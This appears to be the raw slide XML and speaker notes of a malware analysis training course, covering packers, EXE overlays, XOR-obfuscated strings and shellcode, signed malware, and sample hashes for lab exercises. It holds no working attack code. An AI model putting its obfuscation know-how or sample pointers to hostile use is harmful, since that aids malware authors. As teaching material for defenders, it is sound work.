              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PEExplorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Resource hacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lead into packer discussion (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PEiD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Possibly lead into obfuscation and de-obfuscation techniques, possibly show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FileInsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in action [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> http:// overlay]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>malware\Week1\Class2\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BinaryAnalysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	ccqqo.sys	- Native subsystem.  Section names include INIT and RELOC.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  Imports kernel functions from ntoskrnl.exe.  PDB path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	gmer.exe	- Packed as evidence of high entropy.  In combination with section names of UPX suggest the file is UPX packed.  Briefly talk about runtime packers. Manifest shows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>requestedExecutionLevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>requireAdministrator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>malware\Week1\Class2\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BinaryAnalysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ExeAppend</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	appended.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> – Overlay is code or data immediately proceeding the end of the last section according to the PE header.  EXE Appended samples contain another PE file at this location, where the primary exe is an installer of the later.  HIEW shows virtual addressing ending, followed by another MZ magic header.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FileInsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> has a plugin to extract such embedded executables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>malware\Week1\Class2\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BinaryAnalysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SignedMalware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Perhaps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> blurring the line between forensic and binary analysis, we can let Windows verify Digital Signatures to see if everything is in order.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Import analysis ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NTFS Streams (ADS),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which leads to discussion around file system attributes versus attributes that are part of the binary</a:t>
            </a:r>
          </a:p>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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379813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none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>VMs contain malicious samples and under no circumstances should be removed from the lab.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u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>No unauthorized person should have access to systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> containing malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" u="none" strike="noStrike"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6</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AutoIt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: 004c746d26d65d6de7f1a98c02bad331b05ce11f4860a4b31fd0db4fc652f7e5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also show that once you have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the source, you work is not always done (obfuscation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lead into obfuscation and de-obfuscation techniques</a:t>
            </a:r>
          </a:p>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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379813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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362454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Samples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adobe reader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open office</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VT Good</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VT PUA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> sample might be impacting more people?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Supposed clean sample could be part of an advanced attack?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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379813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Navigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> pane</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>StringsAll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PEInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-Lite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Find PE file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Embedded Exe Extract</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Decode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>XOR text search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Bookmarks tab</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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35827325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sample b95c54fb6124bf91e1aed4d28e78be4e_XOR.bin, same as earlier string example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Sample 1 - 003e5f1465057a6a3942e33569df494a_d7db612eef4afa4e7d97e8179c25279b5e7e8cc732eac06e604b51dcbeeafd5e_00400000.mem (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Policy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Sample 2 - 958185eeee604aef4bf7299d1c2ff656ee633fa94eb2ebb6935d8828a743e587 (MBR) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>aaaaaaciip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Sample 3 - 147AB658D0366A8E41DE1D4F9E814565 XOR (0x01)</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379813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1 - 552031-688646396.dat.bin (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>niwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) Fake Signed, two embedded exes with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a mask of 0x88 PhysicalDrive0\Sec0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sample 2 - 08c896502b2f6637196cc10aa0f94ff4064011932a087640be5bdc944584cdd1_ (ANI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> exploit MS05-002) [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>XORed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> URL]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Sample 3 - abf5fd2bec67beff9b224f1d6c963d70fe65dbbe98b6373947f42b51ee7a4ee5_ (CVE-2013-3897) [extract shell code, swap bytes to reveal]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>311ca14b5da3f6b20207d906afa3ab410b1d4b95f490567d3213595dae197b7b – another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>swapbytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and XOR (0x80)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37981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7</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http://www.marketsandmarkets.com/Market-Reports/endpoint-security-market-29081235.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> if one knows the answer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>(bidding) “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Average </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>malware infection costs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> $2000 per day per infected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>host.”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Threats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are more complex.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Attackers are more organized and funded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Nation sates play a more active role.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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8</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Viruses spread copies of their malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Parasitics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> rely on a hos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>t file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Polymorphics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> change their ‘fingerprint’ as they infect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Host Worms spread exact copies of themselves, while Network worms spread on their own (aka self-replicating worms; exploit remote services for code execution)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Trojans are not what they appear</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9</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Md5 hash generates cryptographic value 16 bytes for data integrity aka not tampered with. Md5 collisions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> – Flame abused this and created fake MS certificate</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1917605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Signed malware – why a challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File-less malware – why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>a challenge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA3EE01F-8C47-41E7-A336-DD2FB67B46FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1917605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5715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1784664" y="2140298"/>
            <a:ext cx="5807876" cy="1079365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPts val="3720"/>
              </a:lnSpc>
              <a:defRPr sz="3000" b="0" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
                <a:cs typeface="Franklin Gothic Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Title of Presentation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FRANKLIN GOTHIC MEDIUM 30PT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115716" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1787840" y="3238152"/>
            <a:ext cx="5398322" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
                <a:cs typeface="Franklin Gothic Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subtitle of Presentation Franklin Gothic Medium 16pt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1709351" y="1929027"/>
            <a:ext cx="5883190" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1710724" y="3756455"/>
            <a:ext cx="5883190" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
